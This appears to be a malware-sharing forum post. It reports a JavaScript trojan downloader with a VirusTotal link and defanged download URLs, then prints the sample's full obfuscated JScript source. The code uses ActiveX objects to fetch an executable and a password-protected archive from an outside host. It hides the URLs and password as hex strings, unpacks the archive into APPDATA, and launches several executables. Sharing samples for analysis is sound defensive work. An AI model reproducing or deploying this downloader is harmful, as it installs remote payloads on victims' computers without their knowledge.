Attachments
(4.07 KiB) Downloaded 55 times
ikolor wrote:next..JS trojan downloader. Attempts to download & exec, files unavailable
https://www.virustotal.com/en/file/bfe2 ... 474222186/
hxxp://leitor.com.br/Sky/7za.exe
hxxp://leitor.com.br/Sky/Dakneerodspa.zip
script
Code: Select all
var _$_1538 = ["", "Process", "Environment", "WScript.Shell", "APPDATA", "e", "x", "\\st4rrys1lr0.", "\\v0rgk34z0l.", "\\r1ssud0sk0.", "MSXML2.XMLHTTP", "ADODB.Stream", "GET", "Open", "Send", "type", "open", "responseBody", "write",
"savetofile", "toString", "length", "0", "%", "s/[^0-9A-Z]//g", "replace", "toUpperCase", "charAt", "p", "z", "i", "\\Nalywynhol.", "63706C32303135", "687474703A2F2F6C6569746F722E636F6D2E62722F536B792F377A612E", "\\7za.",
"687474703A2F2F6C6569746F722E636F6D2E62722F536B792F44616B6E6565726F647370612E", " x ", " -p", " -o", "\\", "Wscript.Shell", "Run", "Exec"];
var GRAMER = _$_1538[0];
var SSL = _$_1538[0];
var SHA456 = _$_1538[0];
environmentVars = new ActiveXObject(_$_1538[3])[_$_1538[2]](_$_1538[1]);
var strNameShow = environmentVars(_$_1538[4]);
var outb = _$_1538[5];
var kiss = _$_1538[5];
var join = kiss + _$_1538[6];
var fill = join + outb;
var skypeLocal = strNameShow;
var dinamicy = _$_1538[7] + fill;
var dinamicy2 = _$_1538[8] + fill;
var dinamicy3 = _$_1538[9] + fill;
function wait(k) {
var h = new Date();
var j = null;
do {
j = new Date()
} while (j - h < k);
}
function submainpu(g, f) {
xHttp = new ActiveXObject(_$_1538[10]);
bStrm = new ActiveXObject(_$_1538[11]);
xHttp[_$_1538[13]](_$_1538[12], g, false);
xHttp[_$_1538[14]]();
bStrm[_$_1538[15]] = 1;
bStrm[_$_1538[16]]();
bStrm[_$_1538[18]](xHttp[_$_1538[17]]);
bStrm[_$_1538[19]](f, 2)
}
function charmerr(a) {
a = a[_$_1538[20]](16);
if (a[_$_1538[21]] == 1) {
a = _$_1538[22] + a
};
a = _$_1538[23] + a;
return unescape(a)
}
var valuekeyhx = {
"00": 0,
"01": 1,
"02": 2,
"03": 3,
"04": 4,
"05": 5,
"06": 6,
"07": 7,
"08": 8,
"09": 9,
"0A": 10,
"0B": 11,
"0C": 12,
"0D": 13,
"0E": 14,
"0F": 15,
"10": 16,
"11": 17,
"12": 18,
"13": 19,
"14": 20,
"15": 21,
"16": 22,
"17": 23,
"18": 24,
"19": 25,
"1A": 26,
"1B": 27,
"1C": 28,
"1D": 29,
"1E": 30,
"1F": 31,
"20": 32,
"21": 33,
"22": 34,
"23": 35,
"24": 36,
"25": 37,
"26": 38,
"27": 39,
"28": 40,
"29": 41,
"2A": 42,
"2B": 43,
"2C": 44,
"2D": 45,
"2E": 46,
"2F": 47,
"30": 48,
"31": 49,
"32": 50,
"33": 51,
"34": 52,
"35": 53,
"36": 54,
"37": 55,
"38": 56,
"39": 57,
"3A": 58,
"3B": 59,
"3C": 60,
"3D": 61,
"3E": 62,
"3F": 63,
"40": 64,
"41": 65,
"42": 66,
"43": 67,
"44": 68,
"45": 69,
"46": 70,
"47": 71,
"48": 72,
"49": 73,
"4A": 74,
"4B": 75,
"4C": 76,
"4D": 77,
"4E": 78,
"4F": 79,
"50": 80,
"51": 81,
"52": 82,
"53": 83,
"54": 84,
"55": 85,
"56": 86,
"57": 87,
"58": 88,
"59": 89,
"5A": 90,
"5B": 91,
"5C": 92,
"5D": 93,
"5E": 94,
"5F": 95,
"60": 96,
"61": 97,
"62": 98,
"63": 99,
"64": 100,
"65": 101,
"66": 102,
"67": 103,
"68": 104,
"69": 105,
"6A": 106,
"6B": 107,
"6C": 108,
"6D": 109,
"6E": 110,
"6F": 111,
"70": 112,
"71": 113,
"72": 114,
"73": 115,
"74": 116,
"75": 117,
"76": 118,
"77": 119,
"78": 120,
"79": 121,
"7A": 122,
"7B": 123,
"7C": 124,
"7D": 125,
"7E": 126,
"7F": 127,
"80": 128,
"81": 129,
"82": 130,
"83": 131,
"84": 132,
"85": 133,
"86": 134,
"87": 135,
"88": 136,
"89": 137,
"8A": 138,
"8B": 139,
"8C": 140,
"8D": 141,
"8E": 142,
"8F": 143,
"90": 144,
"91": 145,
"92": 146,
"93": 147,
"94": 148,
"95": 149,
"96": 150,
"97": 151,
"98": 152,
"99": 153,
"9A": 154,
"9B": 155,
"9C": 156,
"9D": 157,
"9E": 158,
"9F": 159,
"A0": 160,
"A1": 161,
"A2": 162,
"A3": 163,
"A4": 164,
"A5": 165,
"A6": 166,
"A7": 167,
"A8": 168,
"A9": 169,
"AA": 170,
"AB": 171,
"AC": 172,
"AD": 173,
"AE": 174,
"AF": 175,
"B0": 176,
"B1": 177,
"B2": 178,
"B3": 179,
"B4": 180,
"B5": 181,
"B6": 182,
"B7": 183,
"B8": 184,
"B9": 185,
"BA": 186,
"BB": 187,
"BC": 188,
"BD": 189,
"BE": 190,
"BF": 191,
"C0": 192,
"C1": 193,
"C2": 194,
"C3": 195,
"C4": 196,
"C5": 197,
"C6": 198,
"C7": 199,
"C8": 200,
"C9": 201,
"CA": 202,
"CB": 203,
"CC": 204,
"CD": 205,
"CE": 206,
"CF": 207,
"D0": 208,
"D1": 209,
"D2": 210,
"D3": 211,
"D4": 212,
"D5": 213,
"D6": 214,
"D7": 215,
"D8": 216,
"D9": 217,
"DA": 218,
"DB": 219,
"DC": 220,
"DD": 221,
"DE": 222,
"DF": 223,
"E0": 224,
"E1": 225,
"E2": 226,
"E3": 227,
"E4": 228,
"E5": 229,
"E6": 230,
"E7": 231,
"E8": 232,
"E9": 233,
"EA": 234,
"EB": 235,
"EC": 236,
"ED": 237,
"EE": 238,
"EF": 239,
"F0": 240,
"F1": 241,
"F2": 242,
"F3": 243,
"F4": 244,
"F5": 245,
"F6": 246,
"F7": 247,
"F8": 248,
"F9": 249,
"FA": 250,
"FB": 251,
"FC": 252,
"FD": 253,
"FE": 254,
"FF": 255
};
function keyCount(e) {
e = e[_$_1538[26]]()[_$_1538[25]](new RegExp(_$_1538[24]));
var d = _$_1538[0];
var c = _$_1538[0];
for (var b = 0; b < e[_$_1538[21]]; b++) {
c += e[_$_1538[27]](b);
if (c[_$_1538[21]] == 2) {
d += charmerr(valuekeyhx[c]);
c = _$_1538[0]
}
};
return d
}
var last = _$_1538[28];
var kings = _$_1538[29];
var buy = kings + _$_1538[30];
var still = buy + last;
var unzname = _$_1538[31] + still;
var uncode = keyCount(_$_1538[32]);
submainpu(keyCount(_$_1538[33]) + fill, skypeLocal + _$_1538[34] + fill);
submainpu(keyCount(_$_1538[35]) + still, skypeLocal + unzname);
compilerVar = skypeLocal + _$_1538[34] + fill + _$_1538[36] + skypeLocal + unzname + _$_1538[37] + uncode + _$_1538[38] + skypeLocal + _$_1538[39];
var mystring = skypeLocal + dinamicy;
var mystring2 = skypeLocal + dinamicy2;
var mystring3 = skypeLocal + dinamicy3;
asgone = new ActiveXObject(_$_1538[40]);
asgone[_$_1538[41]](compilerVar, 1, 1);
WSHELL = new ActiveXObject(_$_1538[40]);
WSHELL[_$_1538[42]](mystring);
wait(90000);
WSHELL = new ActiveXObject(_$_1538[40]);
WSHELL[_$_1538[42]](mystring2);
WSHELL = new ActiveXObject(_$_1538[40]);
WSHELL[_$_1538[42]](mystring3);
WSHELL = null;
var GRAMER = _$_1538[0];
var SSL = _$_1538[0];
var SHA456 = _$_1538[0]
